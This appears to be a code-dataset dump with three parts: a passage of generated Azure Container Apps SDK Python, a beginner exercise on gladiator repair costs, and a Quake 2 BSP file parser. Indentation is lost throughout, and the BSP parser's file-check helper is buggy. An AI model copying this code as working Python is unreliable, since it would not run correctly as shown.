:param container_app_envelope: Properties used to create a container app. Required.
:type container_app_envelope: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties used to create a container app. Is either a model
type or a IO type. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
container_app_envelope=container_app_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@distributed_trace
def begin_delete(self, resource_group_name: str, container_app_name: str, **kwargs: Any) -> LROPoller[None]:
"""Delete a Container App.
Delete a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
container_app_name=container_app_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
def _update_initial(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> Optional[_models.ContainerApp]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[Optional[_models.ContainerApp]] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(container_app_envelope, (IO, bytes)):
_content = container_app_envelope
else:
_json = self._serialize.body(container_app_envelope, "ContainerApp")
request = build_update_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@overload
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: _models.ContainerApp,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Required.
:type container_app_envelope: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Is either
a model type or a IO type. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
container_app_envelope=container_app_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@distributed_trace
def list_custom_host_name_analysis(
self, resource_group_name: str, container_app_name: str, custom_hostname: Optional[str] = None, **kwargs: Any
) -> _models.CustomHostnameAnalysisResult:
"""Analyzes a custom hostname for a Container App.
Analyzes a custom hostname for a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param custom_hostname: Custom hostname. Default value is None.
:type custom_hostname: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CustomHostnameAnalysisResult or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.CustomHostnameAnalysisResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.CustomHostnameAnalysisResult] = kwargs.pop("cls", None)
request = build_list_custom_host_name_analysis_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
custom_hostname=custom_hostname,
api_version=api_version,
template_url=self.list_custom_host_name_analysis.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("CustomHostnameAnalysisResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_custom_host_name_analysis.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listCustomHostNameAnalysis"
}
@distributed_trace
def list_secrets(
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> _models.SecretsCollection:
"""List secrets for a container app.
List secrets for a container app.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretsCollection or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.SecretsCollection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.SecretsCollection] = kwargs.pop("cls", None)
request = build_list_secrets_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_secrets.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("SecretsCollection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_secrets.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listSecrets"
}
@distributed_trace
def get_auth_token(
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> _models.ContainerAppAuthToken:
"""Get auth token for a container app.
Get auth token for a container app.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ContainerAppAuthToken or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.ContainerAppAuthToken
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
404: lambda response: ResourceNotFoundError(response=response, error_format=ARMErrorFormat),
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppAuthToken] = kwargs.pop("cls", None)
request = build_get_auth_token_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_auth_token.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ContainerAppAuthToken", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_auth_token.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/getAuthtoken"
}
| [
"[email protected]"
] | |
17f68468ed1bec0220733058ab02887e08228ee7 | 1e8c4293d02cd72297eb80aab776cc8dffb71690 | /Data Types and Variables/10.Gladiator Expenses.py | 2eee653802d2b6b8caa110d2fcbf652bf9b1e498 | [] | no_license | deyandyankov1/Fundamentals | cacdf8f4c9aeee02ffd5f91ba5494f6c4cdc504a | 0152e8f307a44b7ee355a4020405e6e1e42ab1e6 | refs/heads/main | 2023-02-25T11:36:14.840005 | 2021-02-02T10:46:44 | 2021-02-02T10:46:44 | 330,765,629 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | lost_fights_count = int(input())
helmet_price = float(input())
sword_price = float(input())
shield_price = float(input())
armor_price = float(input())
sum_for_repair = 0
broken_shield_count = 0
for lost_fight in range(1, lost_fights_count +1):
if lost_fight % 2 == 0:
sum_for_repair += helmet_price
if lost_fight % 3 == 0:
sum_for_repair += sword_price
if lost_fight % 2 == 0 and lost_fight % 3 == 0:
sum_for_repair += shield_price
broken_shield_count += 1
if broken_shield_count % 2 == 0 and not broken_shield_count == 0:
sum_for_repair += armor_price
print(f"Gladiator expenses: {sum_for_repair:.2f} aureus") | [
"[email protected]"
] | |
cd979cf383863e27fac2a067d8e949630956d387 | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/io_scene_md2/quake2/bsp.py | fd4a108bf3ac3eaa8e59362e0ea2f1064605f00e | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,530 | py | """This module provides file I/O for Quake 2 BSP map files.
Example:
bsp_file = bsp.Bsp.open('base1.bsp')
References:
Quake 2 Source
- id Software
- https://github.com/id-Software/Quake-2
Quake 2 BSP File Format
- Max McGuire
- http://www.flipcode.com/archives/Quake_2_BSP_File_Format.shtml
"""
import io
import struct
__all__ = ['BadBspFile', 'is_bspfile', 'Bsp']
class BadBspFile(Exception):
pass
def _check_bspfile(fp):
fp.seek(0)
data = fp.read(struct.calcsize('<4si'))
identity, version = struct.unpack('<4si', data)[0]
return identity is b'IBSP' and version is 38
def is_bspfile(filename):
"""Quickly see if a file is a bsp file by checking the magic number.
The filename argument may be a file for file-like object.
"""
result = False
try:
if hasattr(filename, 'read'):
return _check_bspfile(fp=filename)
else:
with open(filename, 'rb') as fp:
return _check_bspfile(fp)
except:
pass
return result
class ClassSequence:
"""Class for reading a sequence of data structures"""
Class = None
@classmethod
def write(cls, file, structures):
for structure in structures:
cls.Class.write(file, structure)
@classmethod
def read(cls, file):
return [cls.Class(*c) for c in struct.iter_unpack(cls.Class.format, file.read())]
class Entities:
"""Class for representing the entities lump"""
@classmethod
def write(cls, file, entities):
entities_data = entities.encode('cp437')
file.write(entities_data)
@classmethod
def read(cls, file):
entities_data = file.read()
return entities_data.decode('cp437')
class Plane:
"""Class for representing a bsp plane
Attributes:
normal: The normal vector to the plane.
distance: The distance from world (0, 0, 0) to a point on the plane
type: Planes are classified as follows:
0: Axial plane aligned to the x-axis.
1: Axial plane aligned to the y-axis.
2: Axial plane aligned to the z-axis.
3: Non-axial plane roughly aligned to the x-axis.
4: Non-axial plane roughly aligned to the y-axis.
5: Non-axial plane roughly aligned to the z-axis.
"""
format = '<4fi'
size = struct.calcsize(format)
__slots__ = (
'normal',
'distance',
'type'
)
def __init__(self,
normal_x,
normal_y,
normal_z,
distance,
type):
self.normal = normal_x, normal_y, normal_z
self.distance = distance
self.type = type
@classmethod
def write(cls, file, plane):
plane_data = struct.pack(cls.format,
*plane.normal,
plane.distance,
plane.type)
file.write(plane_data)
@classmethod
def read(cls, file):
plane_data = file.read(cls.size)
plane_struct = struct.unpack(cls.format, plane_data)
return Plane(*plane_struct)
class Planes(ClassSequence):
Class = Plane
class Vertex:
"""Class for representing a vertex
A Vertex is an XYZ triple.
Attributes:
x: The x-coordinate
y: The y-coordinate
z: The z-coordinate
"""
format = '<3f'
size = struct.calcsize(format)
__slots__ = (
'x',
'y',
'z'
)
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __getitem__(self, item):
if type(item) is int:
return [self.x, self.y, self.z][item]
elif type(item) is slice:
start = item.start or 0
stop = item.stop or 3
return [self.x, self.y, self.z][start:stop]
@classmethod
def write(cls, file, vertex):
vertex_data = struct.pack(cls.format,
vertex.x,
vertex.y,
vertex.z)
file.write(vertex_data)
@classmethod
def read(cls, file):
vertex_data = file.read(cls.size)
vertex_struct = struct.unpack(cls.format, vertex_data)
return Vertex(*vertex_struct)
class Vertexes(ClassSequence):
Class = Vertex
class Visibilities:
@classmethod
def write(cls, file, structures):
file.write(structures)
@classmethod
def read(cls, file):
return file.read()
class Node:
"""Class for representing a node
A Node is a data structure used to compose a bsp tree data structure. A
child may be a Node or a Leaf.
Attributes:
plane_number: The number of the plane that partitions the node.
children: A two-tuple of the two sub-spaces formed by the partitioning
plane.
Note: Child 0 is the front sub-space, and 1 is the back sub-space.
Note: If bit 15 is set, the child is a leaf.
bounding_box_min: The minimum coordinate of the bounding box containing
this node and all of its children.
bounding_box_max: The maximum coordinate of the bounding box containing
this node and all of its children.
first_face: The number of the first face in Bsp.mark_surfaces.
number_of_faces: The number of faces contained in the node. These
are stored in consecutive order in Bsp.mark_surfaces starting at
Node.first_face.
"""
format = '<3i6h2H'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'children',
'bounding_box_min',
'bounding_box_max',
'first_face',
'number_of_faces'
)
def __init__(self,
plane_number,
child_front,
child_back,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
first_face,
number_of_faces):
self.plane_number = plane_number
self.children = child_front, child_back
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.first_face = first_face
self.number_of_faces = number_of_faces
@classmethod
def write(cls, file, node):
node_data = struct.pack(cls.format,
node.plane_number,
*node.children,
*node.bounding_box_min,
*node.bounding_box_max,
node.first_face,
node.number_of_faces)
file.write(node_data)
@classmethod
def read(cls, file):
node_data = file.read(cls.size)
node_struct = struct.unpack(cls.format, node_data)
return Node(*node_struct)
class Nodes(ClassSequence):
Class = Node
class SurfaceFlag:
LIGHT = 0x1
SLICK = 0x2
SKY = 0x4
WARP = 0x8
TRANS33 = 0x10
TRANS66 = 0x20
FLOWING = 0x40
NODRAW = 0x80
class TextureInfo:
"""Class for representing a texture info
Attributes:
s: The s vector in texture space represented as an XYZ three-tuple.
s_offset: Horizontal offset in texture space.
t: The t vector in texture space represented as an XYZ three-tuple.
t_offset: Vertical offset in texture space.
flags: A bitfield of surface behaviors.
value:
texture_name: The path of the texture.
next_texture_info: For animated textures. Sequence will be terminated
with a value of -1
"""
format = '<8f2i32si'
size = struct.calcsize(format)
__slots__ = (
's',
's_offset',
't',
't_offset',
'flags',
'value',
'texture_name',
'next_texture_info'
)
def __init__(self,
s_x,
s_y,
s_z,
s_offset,
t_x,
t_y,
t_z,
t_offset,
flags,
value,
texture_name,
next_texture_info):
self.s = s_x, s_y, s_z
self.s_offset = s_offset
self.t = t_x, t_y, t_z
self.t_offset = t_offset
self.flags = flags
self.value = value
if type(texture_name) == bytes:
self.texture_name = texture_name.split(b'\00')[0].decode('ascii')
else:
self.texture_name = texture_name
self.next_texture_info = next_texture_info
@classmethod
def write(cls, file, texture_info):
texture_info_data = struct.pack(cls.format,
*texture_info.s,
texture_info.s_offset,
*texture_info.t,
texture_info.t_offset,
texture_info.flags,
texture_info.value,
texture_info.texture_name.encode('ascii'),
texture_info.next_texture_info)
file.write(texture_info_data)
@classmethod
def read(cls, file):
texture_info_data = file.read(cls.size)
texture_info_struct = struct.unpack(cls.format, texture_info_data)
return TextureInfo(*texture_info_struct)
class TextureInfos(ClassSequence):
Class = TextureInfo
class Face:
"""Class for representing a face
Attributes:
plane_number: The plane in which the face lies.
side: Which side of the plane the face lies. 0 is the front, 1 is the
back.
first_edge: The number of the first edge in Bsp.surf_edges.
number_of_edges: The number of edges contained within the face. These
are stored in consecutive order in Bsp.surf_edges starting at
Face.first_edge.
texture_info: The number of the texture info for this face.
styles: A four-tuple of lightmap styles.
light_offset: The offset into the lighting data.
"""
format = '<Hhi2h4Bi'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'side',
'first_edge',
'number_of_edges',
'texture_info',
'styles',
'light_offset'
)
def __init__(self,
plane_number,
side,
first_edge,
number_of_edges,
texture_info,
style_0,
style_1,
style_2,
style_3,
light_offset):
self.plane_number = plane_number
self.side = side
self.first_edge = first_edge
self.number_of_edges = number_of_edges
self.texture_info = texture_info
self.styles = style_0, style_1, style_2, style_3
self.light_offset = light_offset
@classmethod
def write(cls, file, plane):
face_data = struct.pack(cls.format,
plane.plane_number,
plane.side,
plane.first_edge,
plane.number_of_edges,
plane.texture_info,
*plane.styles,
plane.light_offset)
file.write(face_data)
@classmethod
def read(cls, file):
face_data = file.read(cls.size)
face_struct = struct.unpack(cls.format, face_data)
return Face(*face_struct)
class Faces(ClassSequence):
Class = Face
class Lighting:
@classmethod
def write(cls, file, lighting):
file.write(lighting)
@classmethod
def read(cls, file):
return file.read()
class Contents:
SOLID = 1
WINDOW = 2
AUX = 4
LAVA = 8
SLIME = 16
WATER = 32
MIST = 64
LAST_VISIBLE = 64
AREAPORTAL = 0x8000
PLAYERCLIP = 0x10000
MONSTERCLIP = 0x20000
CURRENT_0 = 0x40000
CURRENT_90 = 0x80000
CURRENT_180 = 0x100000
CURRENT_270 = 0x200000
CURRENT_UP = 0x400000
CURRENT_DOWN = 0x800000
ORIGIN = 0x1000000
